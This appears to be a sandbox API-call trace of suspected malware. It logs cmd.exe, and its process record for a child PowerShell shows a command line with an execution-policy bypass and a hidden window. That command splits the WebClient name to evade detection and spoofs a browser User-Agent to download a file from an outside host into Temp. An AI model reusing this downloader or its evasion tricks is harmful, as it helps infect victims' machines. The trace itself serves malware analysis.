	[0100.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf850, cchData=128 | out: lpLCData="1") returned 2
	[0100.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0100.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0100.040] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0100.040] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0100.040] GetProcessHeap () returned 0x3a0000
	[0100.040] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x20c) returned 0x3b9f60
	[0100.040] GetConsoleTitleW (in: lpConsoleTitle=0x3b9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0100.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0100.041] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0100.041] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0100.041] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0100.041] GetProcessHeap () returned 0x3a0000
	[0100.041] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4012) returned 0x3bc650
	[0100.041] GetProcessHeap () returned 0x3a0000
	[0100.041] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4010) returned 0x3c0670
	[0100.041] GetProcessHeap () returned 0x3a0000
	[0100.041] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x1a) returned 0x3b49a0
	[0100.041] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0100.041] GetProcessHeap () returned 0x3a0000
	[0100.042] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b49a0 | out: hHeap=0x3a0000) returned 1
	[0100.042] GetProcessHeap () returned 0x3a0000
	[0100.042] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c0670 | out: hHeap=0x3a0000) returned 1
	[0100.042] GetProcessHeap () returned 0x3a0000
	[0100.042] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4010) returned 0x3c0670
	[0100.042] GetProcessHeap () returned 0x3a0000
	[0100.042] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x1a) returned 0x3b49a0
	[0100.042] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0100.042] GetProcessHeap () returned 0x3a0000
	[0100.042] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b49a0 | out: hHeap=0x3a0000) returned 1
	[0100.042] GetProcessHeap () returned 0x3a0000
	[0100.042] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c0670 | out: hHeap=0x3a0000) returned 1
	[0100.042] GetProcessHeap () returned 0x3a0000
	[0100.042] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bc650 | out: hHeap=0x3a0000) returned 1
	[0100.043] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0100.043] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0100.043] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0100.043] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0100.043] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0100.043] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0100.043] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0100.043] GetProcessHeap () returned 0x3a0000
	[0100.043] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0) returned 0x3ba180
	[0100.043] GetProcessHeap () returned 0x3a0000
	[0100.043] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x30) returned 0x3b69a0
	[0100.043] GetProcessHeap () returned 0x3a0000
	[0100.043] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x14) returned 0x3b8d80
	[0100.044] GetProcessHeap () returned 0x3a0000
	[0100.044] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0) returned 0x3ba240
	[0100.044] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0100.044] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0100.044] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0100.044] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0100.044] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0100.044] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0100.044] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0100.044] GetProcessHeap () returned 0x3a0000
	[0100.044] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0) returned 0x3ba300
	[0100.044] GetProcessHeap () returned 0x3a0000
	[0100.045] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x2e) returned 0x3b69e0
	[0100.152] _get_osfhandle (_FileHandle=2) returned 0xb
	[0100.152] GetFileType (hFile=0xb) returned 0x2
	[0100.153] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0100.153] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2cf0f8 | out: lpMode=0x2cf0f8) returned 1
	[0100.153] _get_osfhandle (_FileHandle=2) returned 0xb
	[0100.153] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2cf130 | out: lpConsoleScreenBufferInfo=0x2cf130) returned 1
	[0100.153] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0100.153] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x2cf1a0 | out: lpBuffer="'WNjKdpGDFcPRHnV' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x6a
	[0100.153] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4ac96340*, nNumberOfCharsToWrite=0x6a, lpNumberOfCharsWritten=0x2cf120, lpReserved=0x0 | out: lpBuffer=0x4ac96340*, lpNumberOfCharsWritten=0x2cf120*=0x6a) returned 1
	[0100.154] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0100.154] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0100.154] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0100.155] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0100.156] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0100.157] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0100.157] GetProcessHeap () returned 0x3a0000
	[0100.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3bb1e0
	[0100.157] GetProcessHeap () returned 0x3a0000
	[0100.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x228) returned 0x3bb400
	[0100.157] _wcsnicmp (_String1="PowE", _String2="cmd ", _MaxCount=0x4) returned 13
	[0100.158] GetProcessHeap () returned 0x3a0000
	[0100.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x420) returned 0x3bb630
	[0100.158] SetErrorMode (uMode=0x0) returned 0x0
	[0100.158] SetErrorMode (uMode=0x1) returned 0x0
	[0100.158] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3bb640, lpFilePart=0x2cee70 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x2cee70*="Documents") returned 0x1b
	[0100.158] SetErrorMode (uMode=0x0) returned 0x1
	[0100.158] GetProcessHeap () returned 0x3a0000
	[0100.158] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3bb630, Size=0x66) returned 0x3bb630
	[0100.158] GetProcessHeap () returned 0x3a0000
	[0100.158] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb630) returned 0x66
	[0100.158] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0100.158] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0100.158] GetProcessHeap () returned 0x3a0000
	[0100.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x170) returned 0x3a1c30
	[0100.158] GetProcessHeap () returned 0x3a0000
	[0100.158] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x2d0) returned 0x3bb6b0

Process:
	id = "32"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5212a000"
	os_pid = "0x4d8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "31"
	os_parent_pid = "0x9fc"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 257
	os_tid = 0x67c

	[0101.615] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0103.005] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0104.601] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0104.601] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0104.601] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0104.601] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0105.872] GetVersionExW (in: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0105.874] GetVersionExW (in: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0105.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.885] GetVersionExW (in: lpVersionInformation=0x12dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0105.886] SetErrorMode (uMode=0x1) returned 0x1
	[0105.887] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12deb0 | out: lpFileInformation=0x12deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0105.887] SetErrorMode (uMode=0x1) returned 0x1
	[0105.890] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12e120 | out: lpdwHandle=0x12e120) returned 0x94c
	[0105.892] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d37370 | out: lpData=0x2d37370) returned 1
	[0105.894] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12e098, puLen=0x12e090 | out: lplpBuffer=0x12e098*=0x2d3740c, puLen=0x12e090) returned 1
	[0105.896] lstrlenW (lpString="䅁") returned 1
	[0105.904] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d374e8, puLen=0x12e000) returned 1
	[0105.905] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0105.907] CoTaskMemAlloc (cb=0x2e) returned 0x20c8e0
	[0105.907] lstrcpyW (in: lpString1=0x20c8e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0105.908] CoTaskMemFree (pv=0x20c8e0) 
	[0105.908] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d3753c, puLen=0x12e000) returned 1
	[0105.908] lstrlenW (lpString="System.Management.Automation") returned 28
	[0105.908] CoTaskMemAlloc (cb=0x3c) returned 0x1b58b0
	[0105.908] lstrcpyW (in: lpString1=0x1b58b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0105.908] CoTaskMemFree (pv=0x1b58b0) 
	[0105.908] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d37598, puLen=0x12e000) returned 1
	[0105.908] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.908] CoTaskMemAlloc (cb=0x20) returned 0x212c00
	[0105.908] lstrcpyW (in: lpString1=0x212c00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.908] CoTaskMemFree (pv=0x212c00) 
	[0105.908] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d375d8, puLen=0x12e000) returned 1
	[0105.908] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.908] CoTaskMemAlloc (cb=0x44) returned 0x1b58b0
	[0105.908] lstrcpyW (in: lpString1=0x1b58b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.908] CoTaskMemFree (pv=0x1b58b0) 
	[0105.908] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d37640, puLen=0x12e000) returned 1
	[0105.908] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0105.908] CoTaskMemAlloc (cb=0x76) returned 0x1a72a0
	[0105.908] lstrcpyW (in: lpString1=0x1a72a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0105.908] CoTaskMemFree (pv=0x1a72a0) 
	[0105.908] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d376dc, puLen=0x12e000) returned 1
	[0105.908] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.908] CoTaskMemAlloc (cb=0x44) returned 0x1b58b0
	[0105.908] lstrcpyW (in: lpString1=0x1b58b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.908] CoTaskMemFree (pv=0x1b58b0) 
	[0105.908] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d37740, puLen=0x12e000) returned 1
	[0105.908] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0105.908] CoTaskMemAlloc (cb=0x58) returned 0x16f3d0
	[0105.908] lstrcpyW (in: lpString1=0x16f3d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0105.909] CoTaskMemFree (pv=0x16f3d0) 
	[0105.909] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d377bc, puLen=0x12e000) returned 1
	[0105.909] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.909] CoTaskMemAlloc (cb=0x20) returned 0x212c00
	[0105.909] lstrcpyW (in: lpString1=0x212c00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.909] CoTaskMemFree (pv=0x212c00) 
	[0105.909] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2d37464, puLen=0x12e000) returned 1
	[0105.909] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0105.909] CoTaskMemAlloc (cb=0x66) returned 0x211200
	[0105.909] lstrcpyW (in: lpString1=0x211200, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0105.909] CoTaskMemFree (pv=0x211200) 
